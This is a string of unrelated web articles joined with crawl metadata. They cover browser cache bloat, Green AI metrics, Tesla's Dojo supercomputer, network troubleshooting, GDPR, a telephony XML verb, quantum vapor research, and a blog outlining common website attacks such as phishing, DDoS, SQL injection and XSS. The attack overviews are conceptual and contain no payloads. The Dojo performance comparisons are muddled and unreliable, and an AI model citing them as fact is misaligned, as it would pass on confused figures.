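        print(f"{profile.name}: {size_mb:.0f} MB")

print(f"Total web cache data on this machine: {total_mb:.0f} MB")
```

Run across a fleet, figures like these make it straightforward to estimate the storage and logon cost described below.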
Where data grows, security threats follow
But the problem doesn’t stop there, as the data collection goes far beyond a record of websites visited. It can also include information such as usernames, passwords, and account numbers. Furthermore, many websites prompt users to remember login credentials which, when opted for, stores an authentication cookie on the machine. This makes it possible for hackers to steal or copy these authentication cookies and user logins, enabling them to gain access to sites, such as the CRM or any other cloud-based software-as-a-service application, as a verified user without being prompted to provide any credentials.
You can’t walk out
And it isn’t just the Microsoft browsers that create these issues. While browsers such as Google Chrome and Mozilla Firefox do not use WinInet, they do utilise their own proprietary code and databases that perform many of the same actions. And as web sites and web applications become more complicated, compatibility issues also start to occur, forcing businesses to install multiple browsers for their users, exacerbating the data bloat and performance problem further.
The final complication is that much of this web data, along with other personal settings such as email signatures, is usually stored in user profiles. This in turn creates further data bloat and performance issues, particularly when users log in to a roaming or virtual environment.
Addressing the web data challenge
So with the challenges associated with web data bloat unlikely to go anywhere soon what can organisations do to address the problem? Let’s take a look at the pros and cons of the standard options that organisations can implement.
Option one – keep all web data
Continuing to keep all web data will ensure that users have a rich browsing experience, ensuring their expectations of websites and web apps are met. However, not only will steps have to be taken to secure that data, the administrator will also be faced with a requirement for increased back-end storage.
For instance, in a business of 1000 users with an average web data size of 250MB per user an extra 250GB of storage will be required. And if all users log on at 9am this 250GB needs transferring to the users which places strain on the network. All of this affects the user in the way of performance. Login times are massively affected (customers have reported up to 90% of the time taken to log on is down to web data), browser launch times increase, as does the rendering of web pages which, in some extreme cases will time out, impacting productivity.
Option two – delete the data each time
By deleting all web data after each session organisations will remove the impact on logon, storage, and network while addressing concerns around data security. However, this effectively means that for each logon the user will be starting from scratch as far as internet applications are concerned.
Useful browser items such as history and cookies, many of which will be authentication cookies, which are used to recognise users on websites such as AWS and Office365 are not immune and are also lost. So while the issues of bloat and privacy are removed, problems around user experience and productivity remain.
Option three – disallow third party cookies
A further option is to utilise the ‘disallow third party cookies’ setting that all browsers include. This will stop the majority of the “undesired” cookies being stored but might also stop certain website features from operating correctly. As such, by enabling this, all of the issues (performance, security, user experience) would be partially but not fully addressed.
Option four – create whitelists and blacklists
Finally organisations could choose to whitelist and black list certain types of web data. By identifying business applications and websites and “whitelisting” them, while blacklisting problem websites and applications, they can ensure that only data that is relevant to business as usual activity is retained. However, much like disallowing third party cookies, this only partially addresses the issues rather than providing a solution to them.
A new approach to web data bloat
It’s clear that the standard options available all come with a catch – either a rich browsing experience with web bloat and possible privacy issues, or a lean data footprint with quick loading times that’s hampered by browsing and compatibility issues. As such what is needed is a solution that completely manages all aspects of web data, offering organisations the opportunity to strike a balance which best suits their specific requirements.
To achieve this IT teams need a solution that is able to analyse the data generated by simple web browsing and web based applications. By being able to see what data is present on PCs and servers, they can begin to understand what category – desirable and undesirable – that web data falls into, while also assessing the savings in disk space and storage that can be realized by addressing the issue.
With this visibility of the web browser data that resides in the network and the issues it is creating, it then becomes possible to remove unnecessary data. This will not only reduce the size of users’ web browser databases, but will also provide administrators with full control over users’ browsing data to ensure that only required information is kept. In our experience this can reduce the size of WebCache files by 80 to 90%, and the number of cookies in a typical WebCache from typically 5,000 or more to a few hundred.
As cloud and web applications become increasingly prevalent in the IT environment, it’s critical that organisations adapt their practices to ensure that this new plethora of data doesn’t impact performance, security or the user experience. And this can only be achieved once they have not only the ability to gain full visibility of web data but also the capability to manage – and delete it – effectively.
Moving from Red AI to Green AI, Part 1: How to Save the Environment and Reduce Your Hardware Costs
Machine learning, and especially deep learning, has become increasingly more accurate in the past few years. This has improved our lives in ways we couldn’t imagine just a few years ago, but we’re far from the end of this AI revolution. Cars are driving themselves, x-ray photos are being analyzed automatically, and in this pandemic age, machine learning is being used to predict outbreaks of the disease, help with diagnosis, and make other critical healthcare decisions. And for those of us who are sheltering at home, recommendation engines in video on-demand platforms help us forget our troubles for an hour or two.
This increase in accuracy is important to make AI applications good enough for production, but there has been an explosion in the size of these models. It is safe to say that accuracy hasn’t been increasing linearly with the size of the model. The Allen Institute for AI, represented by Schwartz et al. in this article, introduces the concept of Red AI. They define it as “buying” stronger results by just throwing more compute at the model.
In the graph below, borrowed from the same article, you can see how some of the most cutting-edge algorithms in deep learning have increased in terms of model size over time. They are used for different applications, but nonetheless they suggest that the development in infrastructure (access to GPUs and TPUs for computing) and the development in deep learning theory has led to very large models.
The natural follow-up question is if this increase in computing requirements has led to an increase in accuracy. The below graph illustrates accuracy versus model size for some of the more well-known computer vision models. Some of the models offer a slight improvement in accuracy but at an immense cost of computer resources. Leaderboards for popular benchmarks are full of examples of Red AI where improvements are often the result of scaling processing power.
Here, model size is measured by the amount of floating-point operations. As you can see above, the bigger models are more accurate on average, but some of the smaller models (ResNet and FE-Net most prominently) are almost on par in terms of accuracy.
Why should you care? Because model size poses a cost for whoever is paying for your infrastructure, and it also has implications for our environment, as the computational needs of bigger models drain more power from our infrastructure.
To illustrate the energy needed in deep learning, let’s make a comparison. An average American causes a CO2 footprint of 36,000 lbs in one year, while the deep learning Neural Architecture Search (NAS) model costs approximately 626,000 lbs of CO2. That’s more than 17x the average American’s footprint in one year. Furthermore, it costs somewhere between $1 and $3 million in a cloud environment to train. The Natural Language Processing (NLP) model BERT costs approximately 1,400 lbs of CO2 (4% of the average American) and somewhere between $4,000 to $12,000 to train in the cloud.
How can we shift from Red AI that is inefficient and unavailable to the public to efficient and democratic Green AI?
1. Get your power from a renewable source
Needless to say, anything is green if it is powered by something renewable. However, even if your power is from a renewable source, doing unnecessarily power-consuming model building may lead to you using energy that could have been put to better use elsewhere.
2. Measure efficiency, not only accuracy
Machine learning has been obsessed with accuracy — and for good reason. First of all, if a model isn’t accurate enough for what you want to use it for, it can’t be put into production. Second, accuracy is easy to measure, although there are many ways to do it and sometimes it’s hard to prove that the result you obtain is really an unbiased estimate on real-life performance.
Also easy to measure but often overlooked is the resource cost it takes to build a model and to get predictions from it. This comes in many versions, such as the time or energy required to train the model, the time or energy required to score new data (“inference”), as well as model size (in megabytes, number of parameters, and so forth). Schwartz et al. have a comprehensive discussion on which of these metrics are best, and I recommend their article on this topic. As a hardware-independent metric, they recommend the number of floating-point operations (FLOPs) to measure model size. However, this can be difficult to retrieve from whatever software you use to build models.
In a green machine learning study from Linköping University, a combination of accuracy and resource cost is proposed as a way to measure efficiency, with citations from other literature on the topic summarized for convenience. All efficiency metrics derive from the same logic: a measure of model performance (such as accuracy) divided by a measure of the resources consumed to achieve it.
The study mentions various example metrics built from this ratio.
Let’s examine what happens if we apply these metrics to our above computer vision models.
In the graph below, you see that if you divide accuracy by the number of floating-point operations (a measure of computing resources), you get the “Model Size Efficiency” defined above. In this case, the question it answers is: “how many percentage points of accuracy do you get for each billion floating-point operations?” Compare it to the previous graph, and you see that the highly accurate SENet and NASNet are actually the least efficient.
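As a toy illustration of this ratio, here is a short Python sketch. The accuracy and GFLOPs numbers below are illustrative approximations, not exact published figures:

# Approximate ImageNet top-1 accuracy (%) and GFLOPs per forward pass - illustrative only
models = {
    "SqueezeNet": (57.5, 0.8),
    "ResNet-50": (76.1, 4.1),
    "SENet-154": (81.3, 42.3),
}

for name, (top1, gflops) in models.items():
    efficiency = top1 / gflops  # accuracy points per GFLOP
    print(f"{name:>10}: {efficiency:6.1f} accuracy points per GFLOP")

Even with rough numbers, the pattern matches the graphs: the smallest model delivers far more accuracy per unit of compute than the largest one.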
However, one must remember that in the scoping of a machine learning project, an acceptable accuracy should be discussed, (i.e., how accurate does the final model need to be? And how fast can it make predictions?). Many things need to be considered jointly before selecting a final model. If the most efficient model in your case would have been the SqueezeNet, it should also be noted that it is, at least in the case above, significantly less accurate than some much larger models. Is this acceptable? That depends on your use case.
Earth Day is a good time for the machine learning community to think about factors other than accuracy, such as efficiency. When the goal is to improve model accuracy, can we consider other approaches besides throwing megatons of computing at the problem? The real progress would be to make that improvement while balancing the use of our resources. To better quantify this, we have developed methods to measure efficiency. For us, we believe in using efficiency metrics in machine learning software.
On April 22nd, I’m holding a webinar on green machine learning, where we’ll take an in-depth look at theoretical and practical ways to improve efficiency in machine learning. Join us. And if you cannot do that, watch this space for a future blog post with some tips and tricks. | <urn:uuid:63f216d9-5572-4dad-a362-93fb0344f620> | CC-MAIN-2022-40 | https://www.datarobot.com/blog/how-to-save-the-environment-and-reduce-your-hardware-costs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00202.warc.gz | en | 0.954483 | 1,421 | 2.828125 | 3 |
Elon Musk has been hinting for a couple of years that Tesla was developing its own supercomputer. At Tesla's AI Day, the company announced the arrival of Dojo, a supercomputer designed entirely in-house.
Dojo qualifies as a supercomputer by virtue of its complexity and speed, but it differs from other supercomputers in quite a few ways – and, strictly speaking, it is not one yet, because it hasn't been entirely built out.
Tesla's Senior Director of Autopilot Hardware, Ganesh Venkataramanan, is the head of the project and was the point-person for the presentation.
The heart of the design is the Dojo D1 chip, which provides stunning bandwidth and compute performance. Tesla found existing computing platforms lacking for its primary problem: developing self-driving technology by training its massive neural networks. It also hinted that it might make Dojo available to others developing AI in the near future.
Tesla's motivation for Dojo springs from a massive amount of video data captured from over their large fleet of existing vehicles, which it uses to train its neural nets. Tesla was not satisfied with other HPC (High-Performance Computing) options for training its computer vision neural nets and decided they could create a better platform.
It's unusual for a supercomputer to be designed for just one problem. Time will tell whether its design is general-purpose enough to be suitable for other industries and applications, particularly deep learning, optimization, simulation and NLP.
Existing supercomputers are more general-purpose than Dojo. HPC systems are optimized for very complex mathematical models of physical problems or designs, such as climate, cosmology, nuclear weapons and nuclear reactors, novel chemical and material compounds, support for pharmaceutical research, and cryptology.
Just for historical reference, the first supercomputer was the 1964 Control Data Corporation 6600, capable of executing 3 million floating-point operations per second (FLOPS). Fast forward to 2020, and the PlayStation 5 has hardware capable of up to 10.28 teraFLOPS, roughly three million times faster. The fastest supercomputer today is clocked at around 450 petaFLOPS, tens of thousands of times faster than the PlayStation, and Tesla claims Dojo will reach exascale: an exaFLOP is one quintillion (10^18) double-precision floating-point operations per second. I can't be sure whether this is real or hype, because below we'll dig into data that puts Dojo far below exascale.
There is also some controversy about how Dojo is measured. According to the TOP500 list compiled twice per year, "Fugaku" in Kobe, Japan, holds the #1 spot as the undisputed fastest supercomputer in the world with a demonstrated 442 petaFLOPS (it is widely believed that Fugaku is just getting started and could exceed an exaFLOP in its current configuration). This is a staggering three times faster than the #2 entrant, "Summit," at the Oak Ridge Laboratory in Tennessee, with a top speed of 149 petaFLOPS. Dojo, with its roughly 68.75 petaFLOPS, would then sit in sixth place – although, because the next three supercomputers are close behind at 61.4 to 64.59 petaFLOPS and Dojo's figure is an estimate, it may end up in seventh, eighth or even ninth place.
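To keep these orders of magnitude straight, here is a small arithmetic sketch using the approximate figures quoted above (note the FP32 vs FP64 caveat still applies to the PlayStation comparison):

# Rough scale comparison using the figures quoted in this article
cdc_6600 = 3e6       # 3 megaFLOPS (1964)
ps5 = 10.28e12       # 10.28 teraFLOPS (FP32)
fugaku = 442e15      # 442 petaFLOPS (FP64, TOP500)
exaflop = 1e18       # one quintillion operations per second

print(f"PS5 vs CDC 6600:    {ps5 / cdc_6600:,.0f}x")   # roughly 3.4 million times faster
print(f"Fugaku vs PS5:      {fugaku / ps5:,.0f}x")     # roughly 43,000 times faster
print(f"Fugaku vs exascale: {fugaku / exaflop:.2f}")   # about 0.44 of an exaFLOP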
The top supercomputers today cost $500 million or more and often occupy a couple of 5,000-square-foot buildings. They are designed to process very complex mathematical calculations at scale, so it wouldn't make sense to build them for a single application.
While the top 10 or so are devoted to defense and intelligence applications, at least a third of them on the TOP500 list are dedicated to healthcare, and many support crucial drug-related research. There are two supercomputers that I know of that are used in a private enterprise setting, one in an oil- and gas-related study. It is no secret that most of the most powerful ones are used for nuclear weapons research and cybersecurity in the US, EU, Russia and China, and possibly others (although it has been made available for studying COVID-19). Others have advanced the science in weather and climate in significant ways. Some examples are:
- Cambridge-1 – the fastest supercomputer in the UK – was designed and assembled by Nvidia and was clocked at 400 petaFLOPS. It is applied to medical research (as far as we know).
- Summit, the aforementioned IBM-designed computer at the Oak Ridge National Laboratory (ORNL), is currently the fastest supercomputer in the US. Still, its 148.8 petaFLOPS will be eclipsed in 2022 by three computers provided by HPE/Cray. With 4,356 nodes, each with two 22-core Power9 CPUs and six Nvidia Tesla V100 graphics processing units (GPUs), it is already obsolete. It weighs a staggering 340 tons and will be decommissioned and cut up for scrap to make way for a new exascale computer. This raises an important question: will Dojo show significant miniaturization and lower power consumption?
Summit and the other HPC "elephants" get their performance by scaling. The design of the chips, the creation of the nodes, the configuration and, of course, the interconnect are all necessary, but 200 quadrillion FLOPS and 250 petabytes of data storage are achieved by sheer volume. Summit requires 20-30 MW of electricity to run, enough to light a small town.
Summit's "sister" computer was installed at Lawrence Livermore National Laboratory in California. Sierra is air-gapped and applied to predictive applications in nuclear weapon stockpile stewardship, a US DOE program for simulating and maintaining nuclear weapons.
Scrutinizing Tesla's Dojo
Tesla has not developed Dojo from commodity components. It created a unique architecture and several chip designs that were produced, most likely, by Samsung.
For example, instead of using multicore chips cut from a wafer and mounted on motherboards, Tesla uses the entire wafer (chips are normally produced on a wafer and then cut apart). Tesla claimed that its number of GPUs is more than the top 5 supercomputers in the world, but this is a misstatement: it meant that it has more GPUs than the FIFTH fastest supercomputer in the world, Selene, which has 4,480 NVIDIA V100 GPUs.
Andrej Karpathy, Senior Director of AI at Tesla, revealed in a presentation that the largest cluster is made up of NVIDIA's new A100 GPUs, which would put it in the 5th position in the world, but these figures involve some fudging. An FP32 performance metric measures how many single-precision floating-point operations per second the machine can produce; the typical measure for supercomputers is FP64, double-precision floating-point calculations. There was some confusion in the presentation about which metric was used.
Whether Tesla was able to produce such a powerful computer is not nearly as interesting as what they intend to do with it. It remains to be seen if Dojo is a new architecture for supercomputers, exceeding the characteristics of the current ones in production, or a one-off device for their application. We don't know just how clever Dojo is yet.
Telsa could potentially make Dojo the new most powerful supercomputer in the world. But if that's Tesla's plan, they have their work cut out for them. The history of computing is littered with technical breakthroughs that didn't achieve market traction, much less dominance. As General George Patton once said, "No good decision was ever made in a swivel chair." The same holds true for tech. Press conferences don't amount to field victories. Tesla's HPC field victory has not yet been achieved. | <urn:uuid:b56c2800-5633-4262-972b-a22d9bb75687> | CC-MAIN-2022-40 | https://diginomica.com/teslas-dojo-supercomputer-sorting-out-fact-hype | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00402.warc.gz | en | 0.958569 | 1,631 | 3.125 | 3 |
Troubleshooting a network is essential to keeping all of its processes running smoothly. It ensures that problems are eliminated from the system and that no further issues cause a hindrance. The troubleshooting methodology involves a number of steps which should be carried out in a professional manner. Only someone skilled in this process will be able to figure out the issues with the network and devise ways to eliminate them, and that requires in-depth knowledge and a good command of networking concepts.
There is a well-established plan of action to follow. The troubleshooter should work through the steps in the given order, as this makes the task much easier and less complicated. Below you will find the whole process involved in the troubleshooting methodology; by following these steps in the prescribed order, you will be able to troubleshoot almost any network.
The first and most basic step which is involved in the process of troubleshooting is the identification of the problem. It is not possible to devise a solution without knowing the exact issue which might have occurred with the network. The best way to go about this process is to identify the symptoms and then narrow down the problems which could be responsible for it. In this regard, there are four steps which help you to identify the problem which might have occurred with the system.
Information Gathering: In this step, you gather information about any physical problems which might have caused the issue. First, make sure that all the cables are connected in the appropriate places. You can verify this by checking the lights on the network interface card: a solid link light means the connection is established, and a blinking activity light means traffic is being transmitted.
Identify Symptoms: In this step, you need to figure out any symptoms which the problem is showing. For example, you can run ipconfig /all to check whether your computer received its configuration from the DHCP server and not from some other source that could cause issues.
Question Users: The next step is to question other people on the network about the problem. You need to determine whether you are the only one having this problem or whether others are affected as well. If it is only you, the problem is probably with your own computer's settings. However, if others are also experiencing it, the problem may be on a larger scale.
Determine if anything has changed: In this step, you have to find out whether anything has changed that could be a cause of your problem – for example, whether the system recently went through an update or maintenance. If that is the case, you can focus your troubleshooting on that change.
Based on the information which you have gathered till now, you move a step further. For example, if you think that the problem which you are facing is due to the computers having an APIPA address instead of a DHCP address, you should try to have a look at this issue in depth.
Question the obvious: this is the step where you devote your energies to confirming your narrowed-down problem. For example, in the case of a lost DHCP address, you can run ipconfig /renew on the computer to check whether a DHCP address is restored. If it is not, the DHCP server for that computer is probably still not online. This lets you relate all of your previous findings and identify a common cause.
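If you prefer to script this check, a minimal Python sketch can flag interfaces that have fallen back to an APIPA (169.254.x.x) address instead of obtaining a DHCP lease. This is only an illustrative sketch; on some systems the hostname lookup below may not return every interface:

import socket

# Collect the IPv4 addresses the host resolves for its own name
addrs = {info[4][0] for info in socket.getaddrinfo(socket.gethostname(), None, socket.AF_INET)}

apipa = sorted(a for a in addrs if a.startswith("169.254."))
if apipa:
    print("Possible DHCP failure - APIPA addresses found:", ", ".join(apipa))
else:
    print("No APIPA addresses detected:", ", ".join(sorted(addrs)))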
So now you have established a theory about what might be wrong with the network. Next you need to confirm this theory before devoting further energy to it. Meanwhile, you can also provide a temporary workaround. For example, in the case of a lost DHCP server, you can assign IP addresses to the computers manually. However, this should only be for a short time; your main task is to confirm the cause of the problem and start working on it.
Once the theory is confirmed, determine the next steps to resolve the problem: now that your theory has been confirmed, you have to find the best possible solution. Work out the steps you will have to follow to resolve the issue. If the issue is large or requires administrator permissions, refer it to the senior network administrator so it can be eliminated in the least amount of time. However, if the problem is something you can solve yourself, start to form a plan of action for the solution.
If the theory is not confirmed, establish a new theory or escalate: if it turns out that your theory does not hold and the issue you were looking at is not the cause of the problem, you should start over. Go back to the first step and work through the process again until you find the correct cause of the problem facing the network.
Once you have confirmed your theory and figured out the cause of the problem, it is time to make a plan to eliminate the issue. Devise the most feasible plan that lets you resolve the problem in the least amount of time and with the best outcome. For example, in the case of the DHCP problem, you can find ways to put the servers back online, either by doing it yourself or by requesting the senior administrator to do it. You may have to consult other documents relating to the system in order to devise the right plan of action – device manuals, computer manuals and online forums – and you might also consult other technicians.
Once you have figured out the whole plan, you will also need to consider the immediate effects that this change will have on the system. You should know what changes will take place on the computers on the network and how you will be able to judge whether the problem has been resolved. In addition, make sure that your plan is complete and suited to the situation before you move on to implementing it.
After you have successfully figured out a plan of action, it is time to implement it. There are generally two options at this point, and you should choose the more appropriate one: either proceed with your plan yourself, or hand the process over to a more technical person. You usually hand over the process if you think you will not be able to carry out the implementation because it does not lie within your domain. In that case, you can forward the case to the senior administrator, who will then take responsibility for the implementation.
However, if you feel that you can do the process of implementation by yourself, you should go for it. The most favorable process to go about implementation is to break all the larger processes into smaller and simpler tasks which will enable you to manage easily and independently. You then carry out this process by implementing all the steps one by one. You can also gather all the steps which can be implemented at the same time in order to save your time. However, if any of the steps is not implemented correctly, you should do it again to make sure that the output is perfect. Sometimes, you may also need to involve another technical person in this process if you feel the need to do it. Once you perform these steps, you are done with the process of implementation.
After the process of implementation, you have to make sure that your system is perfect to use. The whole process which you did above would be useless if the system does not work perfectly after it and the problem is resolved. In order to confirm that you have eliminated the problem, you will have to check the system and perform all of the functions and test if they work fine. By verifying full system functionality, you will ensure that you have not created another problem while trying to eliminate one problem. In this regard, you might also have to take certain preventative measures if required. It would also be a good idea to let the customer verify full system functionality and make sure that the system is now perfect to work.
However, if you feel that there is still some problem with the system, you will have to carry out the process of troubleshooting again and ensure that the problem is identified and eliminated. Once you finish this last step, you will have successfully carried out the process of troubleshooting the network.
There is an additional step after the implementation of the solution. This process ensures that whole of the process is documented and stored. This helps other people to consult this documentation if any similar problem arises with the network. In fact, it might also aid you in the future when you are performing another troubleshooting process. This documentation will basically comprise of three different components.
Firstly, you will write down the whole process which you used to find the problem. This will involve all the steps starting from the identification of the problem to confirming it. Secondly, you will also have to document all of your actions. This means that you will explain in detail all the steps which you used to eliminate the problem. You will also have to explain what outcomes you got and how successful they were. Lastly, you will have to describe which components you used while performing this process. The description of each component along with its relevance to the problem is also quite essential. Once you have completed this documentation, you are done with the whole process!
We have discussed in detail all the steps which one should take in order to troubleshoot a network. It is interesting to note that the whole process can be divided into smaller and simpler steps to provide ease and improve the final output. All of the processes should be done in the order which has been prescribed. However, the process is not as simple as it looks. One needs to have a detailed knowledge regarding the working of the systems in order to figure out the problems. In fact, the identification of the problem is the most difficult task. The process becomes much simpler if the problem has been identified, as now you just have to devise ways to eliminate it. You should also make a note of the fact that you will have to consult various documents, online resources or other technicians in order to aid you in the whole process. If you just understand all of the steps mentioned, you will be able to master the process of network troubleshooting.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:cedba8b2-b2f2-4c2a-b7f9-ea3f2f2a21c0> | CC-MAIN-2022-40 | https://www.examcollection.com/certification-training/network-plus-network-troubleshooting-methodology.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00402.warc.gz | en | 0.965522 | 2,330 | 2.640625 | 3 |
GDPR is meant to be complied with by each data controller and data processor within the European Union (EU), as well as by entities that manage information regarding living EU residents or nationals. A data controller is any organization that defines the purposes and procedures for personal data processing, while a data processor is any company that handles personal data on behalf of the data controller.
The primary aim of the regulation is to protect individual data, which can be classified in two categories: ‘personal data’ and ‘sensitive personal data’. The first group includes emails, physical addresses, IP addresses or any other information that can help to identify a user, while the latter covers information related to health, biometric and genetics.
The main principles of GDPR are concerned with guaranteeing transparency in data processing; fairness, so that the processing matches its stated description; and adequacy, ensuring the information is relevant and limited to what is necessary for the purposes for which the data are being processed.
The organization is required to remain proactive, developing a plan to prevent and detect a data breach and to evaluate, on a periodic basis, the effectiveness of security practices, while keeping records on performance to establish a path to continual improvement.
The aim of GDPR is to cover all IT systems, including network, endpoints and mobile devices. However, it is a priority to define a catalogue of assets in which personal data are processed or stored.
It is important to identify what devices process or store sensitive data, including cloud services and devices under the Bring Your Own Device (BYOD) policy.
Article 30 of the GDPR requires the organisation to keep records of the processing activities and assets under its responsibility.
A Security Operations Centre (SOC) provides a facility or service for managing information security events. Through it, companies can monitor all user and system activity to identify malicious or suspicious behaviour across all assets within its scope, centralizing logs from applications, systems and the network, and correlating alerts to detect undesirable activity proactively.
The information gathered can be used to investigate the root cause of a security incident by determining the attack method through a forensic analysis procedure.
IT security assessments should be performed on a periodic basis to detect vulnerabilities that need to be resolved. Once a vulnerability has been detected, it is necessary to consider several issues: how many personal records could be exposed, whether the vulnerability has been exploited, and whether there has been an attempt to exploit it.
Finally, the detected vulnerabilities require a planned solution that will resolve the vulnerability efficiently, while ensuring that records are kept on the solutions developed and deployed.
Article 35 of the GDPR requires the performance of a Data Protection Impact Assessment (DPIA) or similar procedures, while article 32 requires the organization to deploy security measures appropriate to protecting personal data, aligned with the detected risks.
Alignment with IT Security frameworks such as ISO/IEC 27001:2013, and even certification, can provide a wider view on risk assessment.
There are other IT security frameworks that could be helpful, such as NIST, PCI DSS, COBIT, among others.
Article 32 of the GDPR provides guidance on tests, assessment and the evaluation of the effectiveness of measures for ensuring the security of data processing.
Suggested procedures to measure the effectiveness of security controls include the tests, assessments and evaluations described above, performed on a recurring schedule.
It is mandatory to plan detection and response to a potential data breach in order to minimize its impact, providing a quick and effective incident management procedure.
The incident response plan should include detection, analysis, containment and mitigation procedures. These steps are to be established on a timeline and should be planned.
Those procedures should be tested and measured regularly, as part of a continuous improvement approach.
When a data breach succeeds, the organization needs to report to the regulatory body within the first 72 hours of becoming aware of the incident. However, high-risk incidents should be reported immediately, as article 31 of the GDPR states.
This notification should include a description of the breach, the Data Protection Officer’s (DPO) contact details, the possible consequences of the breach and the measures deployed or planned to address the breach and mitigate its negative effects.
In relation to the previous step, the incident response plan needs to be tested and measured regularly, with the aim of achieving continuous improvement.
Are you ready for GDPR compliance? Tell us how you plan to achieve compliance and how you plan to address these and any other issue that may arise. Contact us if you need further help, we will be happy to hear from you and help you. | <urn:uuid:b5ec9ade-0570-4c5b-aa62-ad6cda1250d8> | CC-MAIN-2022-40 | https://ackcent.com/seven-tips-for-compliance-with-the-general-data-protection-regulation-gdpr/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00402.warc.gz | en | 0.938042 | 958 | 3.234375 | 3 |
Role: <gather>, in simple words, collects the user's response as they make their choice by pressing keys on the dial pad.
Use: The main use of <gather> is to collect the digits as the user enters them from their phone. Some examples of how <gather> can be used are:
- IVR – When building an IVR for your company, <gather> collects the digits that the user enters to direct the call to the correct department or individual.
- Conference – When joining a conference, the caller enters a PIN. This PIN is collected by <gather> to validate the user.
- Authentication – Yet another way of using <gather> is for security authentication when accessing personal or secured information over the phone.
While there are no limitations on where <gather> can be used, there is a defined set of attributes to use with it. Below is a list of these attributes; each attribute has a specific function and accepts certain values.
|Attribute||Accepted values||Default|
|Timeout (in seconds)||Integer||4 Seconds|
|Audiotype||text to speech (tts)||none|
|finishOnKey||0-9 ; * ; #||#|
Here is an example of how <gather> is used within code. The first document prompts the caller and collects the digits:
<?xml version="1.0" encoding="UTF-8"?>
<Response>
    <Gather timeout="10" finishOnKey="*" action="handle-key.php">
        <Say>Please enter the Extension number you want to dial.</Say>
    </Gather>
</Response>
The action URL (handle-key.php) then receives the collected digits in the Digits request parameter and replies with another XML document:
<?php
// handle-key.php: read the digits collected by <Gather> and speak them back to the caller
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
echo "<Response><Say>You entered ".$_REQUEST['Digits']. "</Say></Response>"; ?> | <urn:uuid:f16f3f95-a680-4ffe-9bf7-18f99b341c60> | CC-MAIN-2022-40 | https://www.didforsale.com/didml-reference/gather | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00402.warc.gz | en | 0.709259 | 502 | 2.921875 | 3 |
Quantum Vapor Stabilizing Technique Has Implications for Quantum Computing Storage & Sensing
(Phys.org) A technique to stabilize alkali metal vapor density using gold nanoparticles, so electrons can be accessed for applications including quantum computing, atom cooling and precision measurements, has been patented by scientists at the University of Bath.
This has great potential for a range of applications, including logic operations, storage and sensing in quantum computing, as well as in ultra-precise time measurements with atomic clocks, or in medical diagnostics including cardiograms and encephalograms.
Scientists from the University of Bath, working with a colleague at the Bulgarian Academy of Sciences, have devised an ingenious method of controlling the vapor by coating the interior of containers with nanoscopic gold particles 300,000 times smaller than a pinhead.
Professor Ventsislav Valev, from the University of Bath’s Department of Physics led the research. He said: “We are very excited by this discovery because it has so many applications in current and future technologies! It would be useful in atomic cooling, in atomic clocks, in magnetometry and in ultra-high-resolution spectroscopy.” | <urn:uuid:553620a1-ef57-49b8-9b00-94069b285fd4> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-vapor-stabilizing-technique-implications-quantum-computing-storage-sensing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00402.warc.gz | en | 0.920549 | 242 | 2.875 | 3 |
Do you use the internet? Our guess is you do. Then you must have come across news of hackers stealing data and bringing down services and websites. Here are some website hacking techniques hackers generally use.
In fact, according to hacking stats:
- 64% of companies admit to facing web attacks
- 1 in 131 emails contains malware
- Every day there are 4000+ ransomware attacks taking place
- 95% of breaches happen due to human error
These stats are startling, to say the least.
This does not mean website owners are reckless. No, they do take precautions. It’s only that – this is not enough! All websites and internet services have minute vulnerabilities that could be abused by this or that website hacking technique. Unless you identify and patch these vulnerabilities on time, you remain unsecured.
After every hack, I’ve seen many wonder – “If only I knew better of these hackers and the website hacking techniques, I might have successfully dodged it.“
While this has some truth to it, it isn’t entirely true.
That being said, of course, peeking into the minds of hackers helps. But without proper security equipment, you are only as good as a weaponless soldier.
So, with this blog post, we have created a window for you to look into the operations of a hacker and understand common web threats and the hacking techniques behind them.
Below are the nine most common website hacking techniques used by attackers.
Top Website Hacking Techniques
1. Social engineering (Phishing, Baiting)
Phishing is a method where the attacker replicates the original website and then leads a victim to use this fake website rather than the original one. Once the victim enters their credentials into this website, all details are sent to the attacker. This method can be used to obtain payment information such as credit card data or personal information such as login credentials to important accounts and websites.
Another type of social engineering is the ‘bait and switch’ attack. In this hacking technique, attackers buy advertising spots on trustworthy and popular websites and put up seemingly legit ads. Once the ads are launched, users click on them only to find themselves on a website filled with malware. The malware gets installed on the victim’s system, and the attacker then has free run within it.
2. DDoS attacks
Distributed Denial of Service (DDoS) is mainly used to bring down websites by crashing their servers. Attackers flood the servers of the targeted website with the help of zombie computers or botnets. This overwhelms the servers’ resources and they crash. In several cases, this attack has also been used to steal user information by freezing user forms. The recent DDoS attack on GitHub is an excellent example of how severe these attacks can be.
3. Code injection attacks
Code injection is the general term used for attacks that include injecting malicious codes into systems. Whenever there is improper handling of input data, it becomes vulnerable to code injection attacks.
These attacks are possible when input or output data is not properly validated. Once an attacker is able to inject their code into the system, they can compromise the integrity and security of the system. These attacks can also be used as a way to launch further attacks since the system is already infected and thus vulnerable.
4. SQL Injection
This attack mainly exploits vulnerabilities in a website’s SQL libraries or databases. If a website has such a vulnerability, hackers can use simple SQL statements to obtain information and data from its databases. These statements trick the system into treating them as legitimate queries and then give access to the database.
5. XSS attacks
Also known as Cross-Site Scripting attacks, in this type of attack, hackers inject malicious code into a legit website. When a visitor enters the website and uses their credentials, all data is stored within the website, which the attacker can access anytime. These attacks can be effectively used to steal user data and private information.
